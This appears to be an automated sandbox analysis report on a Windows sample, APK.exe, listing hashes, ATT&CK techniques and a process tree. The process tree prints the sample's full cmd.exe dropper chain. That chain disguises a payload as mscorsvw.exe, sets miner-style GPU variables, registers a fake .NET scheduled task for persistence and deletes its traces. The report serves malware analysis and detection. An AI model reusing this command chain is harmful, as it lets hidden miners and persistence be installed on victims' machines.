06fae1d63da89ca38af37ba2d9854ba3dd5cac537a64bc05d0491eeac8e01f07

Resubmissions

11/08/2024, 12:52

240811-p4dl5avbke 7

11/08/2024, 12:51

240811-p3ykxazfjn 7

Analysis

max time kernel
120s
max time network
123s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
11/08/2024, 12:51

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

APK.exe
Size

477KB
MD5

d86eca302aa2d3a7e13e8fa496fc488c
SHA1

cf2aa0d31a17c46c117e4a98d6f85f11e99a39c9
SHA256

06fae1d63da89ca38af37ba2d9854ba3dd5cac537a64bc05d0491eeac8e01f07
SHA512

0f4375fe5dd404716495c3f84914137692c7954cdf8e647cfb34349c8c47ccc045967e6acc08957f944a23b170426a150d6c2a0246a942363833bd2240dae9e0
SSDEEP

6144:W5Wv9VOJXsvOUSLLsqNGkyIZsPLzCtL8C5nX4E8oH7TWulGFK5uWAF0VMFeMbl/m:WrsW3LxFyPLYjX4kHCKw2VM8iuXd

Score

3^/10

discovery

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
760	cmd.exe
2328	PING.EXE

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2328	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2720	schtasks.exe

Suspicious use of WriteProcessMemory 33 IoCs

description	pid	Process	procid_target
PID 2352 wrote to memory of 760	2352	APK.exe	31
PID 2352 wrote to memory of 760	2352	APK.exe	31
PID 2352 wrote to memory of 760	2352	APK.exe	31
PID 760 wrote to memory of 2328	760	cmd.exe	33
PID 760 wrote to memory of 2328	760	cmd.exe	33
PID 760 wrote to memory of 2328	760	cmd.exe	33
PID 760 wrote to memory of 980	760	cmd.exe	34
PID 760 wrote to memory of 980	760	cmd.exe	34
PID 760 wrote to memory of 980	760	cmd.exe	34
PID 760 wrote to memory of 1712	760	cmd.exe	35
PID 760 wrote to memory of 1712	760	cmd.exe	35
PID 760 wrote to memory of 1712	760	cmd.exe	35
PID 760 wrote to memory of 2232	760	cmd.exe	36
PID 760 wrote to memory of 2232	760	cmd.exe	36
PID 760 wrote to memory of 2232	760	cmd.exe	36
PID 760 wrote to memory of 2376	760	cmd.exe	37
PID 760 wrote to memory of 2376	760	cmd.exe	37
PID 760 wrote to memory of 2376	760	cmd.exe	37
PID 760 wrote to memory of 2240	760	cmd.exe	38
PID 760 wrote to memory of 2240	760	cmd.exe	38
PID 760 wrote to memory of 2240	760	cmd.exe	38
PID 760 wrote to memory of 1872	760	cmd.exe	39
PID 760 wrote to memory of 1872	760	cmd.exe	39
PID 760 wrote to memory of 1872	760	cmd.exe	39
PID 760 wrote to memory of 2264	760	cmd.exe	40
PID 760 wrote to memory of 2264	760	cmd.exe	40
PID 760 wrote to memory of 2264	760	cmd.exe	40
PID 760 wrote to memory of 2720	760	cmd.exe	41
PID 760 wrote to memory of 2720	760	cmd.exe	41
PID 760 wrote to memory of 2720	760	cmd.exe	41
PID 760 wrote to memory of 2400	760	cmd.exe	42
PID 760 wrote to memory of 2400	760	cmd.exe	42
PID 760 wrote to memory of 2400	760	cmd.exe	42

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\APK.exe
"C:\Users\Admin\AppData\Local\Temp\APK.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2352
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C mkdir "%systemroot%\Microsoft.NET" & mkdir "%systemroot%\Microsoft.NET\Framework" & mkdir "%systemroot%\Microsoft.NET\Framework\v3.5" & type "C:\Users\Admin\AppData\Local\Temp\\Plugins\AkSoundEngineDelay.dll" >> "C:\Users\Admin\AppData\Local\Temp\\Plugins\XInputInterface.dll" & ping 127.0.0.1 -n 3 > nul & Xcopy.exe "C:\Users\Admin\AppData\Local\Temp\\Plugins\XInputInterface.dll" "%systemroot%\Microsoft.NET\Framework\v3.5" /I /D /Y /J /C & ren "%systemroot%\Microsoft.NET\Framework\v3.5\XInputInterface.dll" "mscorsvw.exe" & Xcopy.exe "C:\Users\Admin\AppData\Local\Temp\\Plugins\GalaxyEngineAPI.dll" "%systemroot%\Microsoft.NET\Framework\v3.5" /I /D /Y /J /C & ren "%systemroot%\Microsoft.NET\Framework\v3.5\GalaxyEngineAPI.dll" "Microsoft.VisualC.STLCLR.xml" & setx GPU_FORCE_64BIT_PTR 0 & setx GPU_MAX_HEAP_SIZE 100 & setx GPU_USE_SYNC_OBJECTS 1 & setx GPU_MAX_ALLOC_PERCENT 100 & setx GPU_SINGLE_ALLOC_PERCENT 100 & schtasks /create /xml "%systemroot%\Microsoft.NET\Framework\v3.5\Microsoft.VisualC.STLCLR.xml" /tn "Microsoft\Windows\NetFramework\Microsoft .NET Framework" & del "C:\Users\Admin\AppData\Local\Temp\\Plugins\XInputInterface.dll" & del "C:\Users\Admin\AppData\Local\Temp\\Plugins\AkSoundEngineDelay.dll" & del "C:\Users\Admin\AppData\Local\Temp\\Plugins\GalaxyEngineAPI.dll" & del "C:\Users\Admin\AppData\Local\Temp\LauncherOrig.exe" & ren "C:\Users\Admin\AppData\Local\Temp\\Plugins\OTools.dll" "LauncherOrig.exe" & Xcopy.exe "C:\Users\Admin\AppData\Local\Temp\\Plugins\LauncherOrig.exe" "C:\Users\Admin\AppData\Local\Temp" /I /D /Y /J /C & del "C:\Users\Admin\AppData\Local\Temp\\Plugins\LauncherOrig.exe" & "C:\Users\Admin\AppData\Local\Temp\LauncherOrig.exe"
  2⤵
  - System Network Configuration Discovery: Internet Connection Discovery
  - Suspicious use of WriteProcessMemory
  PID:760
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.1 -n 3
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    - Runs ping.exe
    PID:2328
- - C:\Windows\system32\xcopy.exe
    Xcopy.exe "C:\Users\Admin\AppData\Local\Temp\\Plugins\XInputInterface.dll" "C:\Windows\Microsoft.NET\Framework\v3.5" /I /D /Y /J /C
    3⤵
    PID:980
- - C:\Windows\system32\xcopy.exe
    Xcopy.exe "C:\Users\Admin\AppData\Local\Temp\\Plugins\GalaxyEngineAPI.dll" "C:\Windows\Microsoft.NET\Framework\v3.5" /I /D /Y /J /C
    3⤵
    PID:1712
- - C:\Windows\system32\setx.exe
    setx GPU_FORCE_64BIT_PTR 0
    3⤵
    PID:2232
- - C:\Windows\system32\setx.exe
    setx GPU_MAX_HEAP_SIZE 100
    3⤵
    PID:2376
- - C:\Windows\system32\setx.exe
    setx GPU_USE_SYNC_OBJECTS 1
    3⤵
    PID:2240
- - C:\Windows\system32\setx.exe
    setx GPU_MAX_ALLOC_PERCENT 100
    3⤵
    PID:1872
- - C:\Windows\system32\setx.exe
    setx GPU_SINGLE_ALLOC_PERCENT 100
    3⤵
    PID:2264
- - C:\Windows\system32\schtasks.exe
    schtasks /create /xml "C:\Windows\Microsoft.NET\Framework\v3.5\Microsoft.VisualC.STLCLR.xml" /tn "Microsoft\Windows\NetFramework\Microsoft .NET Framework"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2720
- - C:\Windows\system32\xcopy.exe
    Xcopy.exe "C:\Users\Admin\AppData\Local\Temp\\Plugins\LauncherOrig.exe" "C:\Users\Admin\AppData\Local\Temp" /I /D /Y /J /C
    3⤵
    PID:2400